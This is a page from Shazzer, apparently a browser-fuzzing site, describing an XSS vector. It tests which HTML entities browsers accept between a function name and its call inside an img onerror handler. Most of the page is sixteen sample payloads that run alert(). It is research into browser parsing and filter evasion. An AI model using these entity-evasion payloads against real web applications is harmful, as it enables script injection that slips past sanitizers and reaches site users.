Entities allowed between function calls

⚠ Browser differences

This vector uses Shazzer's new features to check which entities are allowed between a function call using images. The results are a bit inconsistent yet because I currently wait for page load.

Created byhackvertor

Created Jun 29, 2024

Updated May 27, 2025

Detecting browser...

CategoryEntity Parsing

VisibilityPublic

TypeXSS

CharsetUTF-8

$[data1] placeholderhtml_entities

Template used:

<img src=data: onerror="log$[data1]('html($[data1])')">

Sample payloads

<img src=data: onerror="alert&emsp13;('&#38;emsp13;')">

<img src=data: onerror="alert&emsp14;('&#38;emsp14;')">

<img src=data: onerror="alert&emsp;('&#38;emsp;')">

<img src=data: onerror="alert&ensp;('&#38;ensp;')">

<img src=data: onerror="alert&hairsp;('&#38;hairsp;')">

<img src=data: onerror="alert&MediumSpace;('&#38;MediumSpace;')">

<img src=data: onerror="alert&nbsp;('&#38;nbsp;')">

<img src=data: onerror="alert&NewLine;('&#38;NewLine;')">

<img src=data: onerror="alert&NonBreakingSpace;('&#38;NonBreakingSpace;')">

<img src=data: onerror="alert&numsp;('&#38;numsp;')">

<img src=data: onerror="alert&puncsp;('&#38;puncsp;')">

<img src=data: onerror="alert&Tab;('&#38;Tab;')">

<img src=data: onerror="alert&ThickSpace;('&#38;ThickSpace;')">

<img src=data: onerror="alert&ThinSpace;('&#38;ThinSpace;')">

<img src=data: onerror="alert&thinsp;('&#38;thinsp;')">

<img src=data: onerror="alert&VeryThinSpace;('&#38;VeryThinSpace;')">

Entities allowed between function calls

Sample payloads

Fuzz results

Distributed Fuzzing